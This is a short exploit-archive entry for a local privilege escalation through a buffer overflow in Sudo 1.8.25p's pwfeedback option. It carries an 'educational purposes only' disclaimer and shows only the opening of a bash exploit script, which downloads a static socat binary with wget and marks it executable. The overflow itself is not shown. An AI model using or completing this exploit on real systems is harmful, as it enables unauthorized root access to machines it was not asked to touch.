Exploits / Vulnerability Discovered : 2020-02-06 |
Type : local |
Platform : linux
This exploit / vulnerability Sudo 1.8.25p pwfeedback buffer overflow is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
#!/bin/bash
# We will need socat to run this.
if [ ! -f socat ];
then
wget https://raw.githubusercontent.com/andrew-d/static-binaries/master/binaries/linux/x86_64/socat
chmod +x socat
fi